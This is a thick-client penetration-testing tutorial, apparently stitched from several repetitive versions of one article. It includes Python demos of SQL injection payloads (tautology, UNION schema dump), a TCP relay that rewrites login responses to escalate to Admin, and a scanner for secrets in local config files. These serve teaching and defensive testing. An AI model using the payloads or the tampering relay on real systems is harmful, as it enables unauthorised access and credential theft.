For an easy to understand approach, thick clients are applications which are deployed locally on our systems. We can break down the different types of pen testing a thick client into several categories; dynamic testing, for example, generally follows the data flow from the client side to the server side. Here our main goal is to test all the input parameters for the different types of attacks the application may be exposed to.

By instructing the client to open its connection to the ITR instead of the server, the entire connection is shifted to work through the ITR, without the client or the server noticing a difference. As a result, both request and response modifications play a key role in testing the thick client for vulnerabilities. Echo Mirage can also be useful in capturing data from Java applets.

Why is two-tier inherently more vulnerable than three-tier? In a two-tier application the client itself holds the database connection, so the queries are built and sent from the user's machine. SQL injection is therefore one of the prime attacks you can carry out against a thick client's database. When a user enters the user name and password in the application, the application sends a SQL query containing the username to the database in order to retrieve the stored credentials (the correct password) for that user. Do note that performing SQL injection against a thick client needs patience and is a time consuming task.

The sensitive data stored by these apps usually includes usernames, passwords, database credentials, license details, cryptographic keys, and configuration details like IP address, port, etc. A related test case is a thick client application writing application logs on the user machine that contain sensitive details like user accounts, trading details, last login date and time, etc. Most of the applications we test do not validate the timestamp and directly accept the local system time from the user; performing malicious transactions after changing the system time leads to inconsistency in the application logs.

About the author: Samrat Das is an expert security consultant who deals with any problems given to him with ease.
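The login lookup described above, worked through as an added example (this is not code from the original article; the users table, the column names and the payload list are constructed for the demo). It builds the query by string concatenation, the way a vulnerable two-tier client does, next to the bound-parameter form, and it shows the "iterate multiple queries and observe each response" routine: a lone quote that produces a syntax error is the first sign of concatenation, a tautology returns every stored credential to the client, and a UNION dumps the schema.

```python
import sqlite3

# Constructed sample data (not from the original article): the users table a
# two-tier thick client would query directly over its database connection.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "alice123")])
    conn.commit()
    return conn

def run_query_vulnerable(conn, username):
    """The login lookup as the article describes it: the username typed into
    the client is pasted straight into the SQL text, so the database returns
    the stored credentials for whatever WHERE clause the attacker builds."""
    query = "SELECT username, password FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()

def run_query_safe(conn, username):
    """Same lookup with a bound parameter: the username is data, never SQL."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username = ?",
        (username,)).fetchall()

# Payloads to mix and match, in the order a tester would escalate them.
PAYLOADS = [
    "alice",                                            # baseline: legitimate value
    "alice'",                                           # unbalanced quote -> syntax error if concatenated
    "alice' --",                                        # trailing comment -> same result as baseline
    "x' OR '1'='1",                                     # tautology -> every row (all stored passwords)
    "x' UNION SELECT name, sql FROM sqlite_master --",  # UNION -> dump the schema
]

def probe(conn, fetch, payloads=PAYLOADS):
    """Send each payload and summarise how the response differs from the
    baseline; an error on a single quote points at string concatenation."""
    summary = {}
    for payload in payloads:
        try:
            rows = fetch(conn, payload)
        except sqlite3.Error as exc:
            summary[payload] = "error: " + exc.__class__.__name__
        else:
            summary[payload] = "%d row(s)" % len(rows)
    return summary

if __name__ == "__main__":
    db = make_db()
    for label, fetch in (("concatenated", run_query_vulnerable),
                         ("parameterised", run_query_safe)):
        print(label)
        for payload, result in probe(db, fetch).items():
            print("  %-50r %s" % (payload, result))
```

Against the concatenated query the tautology payload hands the client every stored password, which is exactly what an intercepting proxy on the client side would then display; the parameterised query returns nothing for the same inputs.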
A thick client is one of the components in a client-server computing architecture: it is connected to the server through a network connection and doesn't consume any of the server's computing resources to execute applications. Examples of thin client applications, by contrast, are web sites like google.com or yahoo.com.

In a two-tier thick client the bulk of the processing and operations is performed on the client side, while the database executes the queries it receives and stores the processed data. During installation, a two tier thick client application stores a configuration file locally on the machine containing the database IP, port, username and password. Even checks on certain parameters can be disabled simply by changing a value in such a file from =yes to =no. A related test case is whether the application validates the DLLs it loads. The alternative, and the better structured option, is the 3-tier architecture.

The table below distinguishes the vulnerabilities faced by a web based and a thick client application (the table body did not survive; its remaining entry reads "Not applicable – browser based vulnerability", which marks a web vulnerability that has no thick client counterpart).

List of tools that can be used for intercepting thick client applications: Echo Mirage is a network proxy tool that uses DLL injection and function hooking techniques to intercept the traffic transmitted and received by local applications. In the launch option, the path of the application is provided to the Echo Mirage tool and it launches the selected application. For capturing data from a Java applet, inject Echo Mirage into the process "java.exe".

This article gave you a brief idea of how to go about testing an application.
A thick client is a computing workstation that includes most or all of the components essential for operating and executing software applications independently. Thick client applications involve both local and server-side processing and often use proprietary protocols for communication. Thick clients are majorly used across organizations for their internal operations.

In the two-tier type, the application is installed on the client side and communicates directly with the database on the server. The three-tier kind of thick client application involves three tiers, wherein the client talks to the application server, which in turn talks to the database.

ITR serves as a TCP tunnel between the client and the server. The screenshot below shows the Gtalk traffic intercepted by the Echo Mirage tool.

In the following sections, we will discuss the critical vulnerabilities faced by thick client applications. Consider a thick client application that displays the GUI (modules/sub-modules) based on the response parameters received from the server after authentication. For SQL injection, you need to iterate multiple queries, mixing and matching them while observing the response to each. Other vulnerabilities that can be tested for in thick client apps are as follows: refer to www.owasp.org for more details on the vulnerabilities listed above.

The author, Samrat Das, is currently a security researcher at Infosec Institute and works for a leading IT company.
Thick client applications are not new, having been in existence for a long time; however, if asked to perform a pentest on a thick client, it is not as simple as a web application pentest. Referenced under multiple names, such as fat client, heavy client, rich client or thick client, such applications follow a client–server architecture. Additionally, thick clients often require specific applications, again posing more work and limitations for deployment. In three-tier applications the communication is carried out using HTTP/HTTPS.

Here is a list of tools which are commonly used for performing thick client pentesting. Burp Proxy is an intercepting proxy server for security testing of web applications. Mallory is a proxy tool that can intercept TCP and UDP traffic and can be used to capture the network traffic of thick client applications using both HTTP(S) and non-HTTP(S) protocols; it can be configured within a virtual machine environment using only network interfaces. Echo Mirage can be run in two different modes: by launching an executable from Echo Mirage, or by injecting into an already running process. Wireshark (linked at the end) can be used to study the non-encrypted traffic sent by the thick client application.

In order to assess the application for sensitive data storage, we need to analyze the files and registry keys used by the application.

Consider the GUI built from response parameters. When an Admin logs in, the application returns one response, and when a low privileged user logs in it returns another (the two sample responses are not reproduced here); the User and Account_No parameters are what differ between them. Exploit: In this case, the attacker or the lower privileged user will intercept the response and modify the User and Account_No parameters to those of the Admin and get access to the administrator module.

That's all readers for now.
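The response tampering exploit above, and the ITR tunnel the article describes (the client is pointed at the relay, which forwards both directions so neither end notices), as an added example that is not part of the original article or of any of the tools it names. The wire format (a "LOGIN <user>" line answered by "User=...;Account_No=..."), the account numbers and the one-shot stand-in server are assumptions constructed for the demo; the relay rewrites the User and Account_No parameters in the server's reply in flight, which is the modification step a tester performs by hand in ITR or with Mallory's regular-expression rules.

```python
import re
import socket
import threading

# Hypothetical line-based protocol for this demo (an assumption, not the
# article's own format): the client sends "LOGIN <user>\n" and the server
# replies "User=<name>;Account_No=<number>\n", from which the client decides
# which modules to show.  The account directory is constructed sample data.
ACCOUNTS = {"Admin": "1001", "bob": "2002"}

def rewrite_response(data):
    """The tampering step: rewrite the server's answer in flight so the client
    believes the Admin account logged in.  A real relay must buffer until it
    holds a whole message; a single local sendall arrives as one chunk here."""
    data = re.sub(rb"User=[^;\n]*", b"User=Admin", data)
    data = re.sub(rb"Account_No=[^;\n]*",
                  b"Account_No=" + ACCOUNTS["Admin"].encode(), data)
    return data

def _pump(src, dst, transform):
    """Copy bytes from src to dst through transform until either side closes."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(transform(chunk))
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass

def _listen():
    lsock = socket.socket()
    lsock.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    lsock.listen(1)
    return lsock

def start_relay(server_addr, rewrite=rewrite_response):
    """ITR-style TCP tunnel: the client is pointed at this address instead of
    the real server; requests pass through untouched, responses are rewritten."""
    lsock = _listen()

    def serve():
        client, _ = lsock.accept()
        upstream = socket.create_connection(server_addr)
        threading.Thread(target=_pump, args=(client, upstream, lambda b: b),
                         daemon=True).start()      # client -> server, unchanged
        _pump(upstream, client, rewrite)           # server -> client, modified
        lsock.close()

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()

def start_fake_server():
    """One-shot stand-in for the application server (constructed for the demo)."""
    lsock = _listen()

    def serve():
        conn, _ = lsock.accept()
        request = conn.recv(4096).decode(errors="replace").strip()
        user = request.split(" ", 1)[1] if request.startswith("LOGIN ") else "guest"
        conn.sendall(("User=%s;Account_No=%s\n"
                      % (user, ACCOUNTS.get(user, "0000"))).encode())
        conn.close()
        lsock.close()

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()

def login_through(addr, user):
    """The thick client's side of the exchange: send LOGIN, read the reply."""
    with socket.create_connection(addr) as c:
        c.sendall(("LOGIN %s\n" % user).encode())
        reply = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply

def demo(user="bob"):
    """Returns (reply seen when connecting directly, reply seen via the relay)."""
    direct = login_through(start_fake_server(), user)
    tampered = login_through(start_relay(start_fake_server()), user)
    return direct, tampered

if __name__ == "__main__":
    direct, tampered = demo()
    print("direct: ", direct)
    print("relayed:", tampered)
```

The client never learns that the reply was altered, which is the point of the test: a server that lets the client decide its privileges from response fields is vulnerable no matter how the client validates them, and the fix is to keep the authorisation decision on the server.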
A thick client, also known as a fat client, is a client in a client–server architecture or network that typically provides rich functionality independent of the server. Typical examples of thick clients are G-Talk, Yahoo Messenger, Microsoft Outlook, online trading portals, etc. In a thin client, by contrast, the complete processing is carried out on the server. To maintain a thick client, IT needs to maintain all systems for software deployment and upgrades, rather than just maintaining the applications on the server.

Exploit: An attacker might get access to the locally stored configuration file containing the database connectivity details.

Set the Process Monitor tool to intercept the registry activity as shown below, then analyze the registry keys accessed by the application to check for sensitive details like keys, encrypted passwords, etc.

With Mallory, traffic can be intercepted in real time or manipulated with regular expressions and a number of action directives. More details on Wireshark can be found here: http://www.wireshark.org/. Interactive TCP Relay (ITR): http://download.cnet.com/Interactive-TCP-Relay/3000-2383_4-10239124.html
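The "analyze the files used by the application" step for sensitive data storage (the locally stored configuration file with database connectivity details, and application logs carrying account details), as an added example that is not part of the original article. It walks an install or profile directory and reports configuration keys and log fields that look like credentials or account data, masking the values so the report itself does not leak them. The key names in PATTERNS and the two sample files are constructed for the demo, not taken from any real application; registry analysis is left to Process Monitor as the article describes, since this script only covers files.

```python
import os
import re
import tempfile

# Key names a tester looks for in the files a thick client writes.  The names
# are assumptions for this example; extend them to match the target's own.
PATTERNS = {
    "password": re.compile(r"(?i)\b(pass(word)?|pwd)\s*[=:]\s*(\S+)"),
    "db_host":  re.compile(r"(?i)\b(db_?host|server|host)\s*[=:]\s*([\w.\-]+)"),
    "db_port":  re.compile(r"(?i)\bport\s*[=:]\s*(\d{1,5})"),
    "key":      re.compile(r"(?i)\b(api|license|secret|crypt)\w*key\s*[=:]\s*(\S+)"),
    "account":  re.compile(r"(?i)\baccount(_?no|_?id)?\s*[=:]\s*(\d+)"),
}

def mask(value):
    """Keep the finding report itself free of the secret it reports."""
    return value[:2] + "*" * max(len(value) - 2, 0)

def scan_text(text, source):
    """Return one finding per (line, pattern) hit, with the value masked."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append({"source": source, "line": lineno, "kind": kind,
                                 "value": mask(m.group(m.lastindex))})
    return findings

def scan_dir(root, exts=(".ini", ".cfg", ".conf", ".xml", ".log", ".txt")):
    """Walk an install/profile directory and scan every config or log file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), os.path.relpath(path, root)))
    return findings

# Constructed sample files standing in for what a two-tier trading client
# might drop on the user's machine (not taken from any real application).
SAMPLE_CONFIG = """[database]
host = 10.0.0.5
port = 1433
user = trading_app
password = Tr@d3r!2013
[license]
license_key = ABCD-EFGH-IJKL
"""

SAMPLE_LOG = """2013-06-12 09:14:02 INFO login user=jsmith account_no=445566 last_login=2013-06-11 17:40:11
2013-06-12 09:15:30 INFO order BUY 100 ACME @ 12.30 account_no=445566
"""

def demo():
    """Write the sample files into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "logs"))
        with open(os.path.join(root, "app.ini"), "w") as fh:
            fh.write(SAMPLE_CONFIG)
        with open(os.path.join(root, "logs", "app.log"), "w") as fh:
            fh.write(SAMPLE_LOG)
        return scan_dir(root)

if __name__ == "__main__":
    for f in demo():
        print("%-14s line %-3d %-9s %s" % (f["source"], f["line"], f["kind"], f["value"]))
```

Point scan_dir at the application's install directory, the user's profile directory and any log path the client writes to; every finding is a candidate for the "sensitive data stored locally" test case, and a database password in a config file is the two-tier exposure the article warns about.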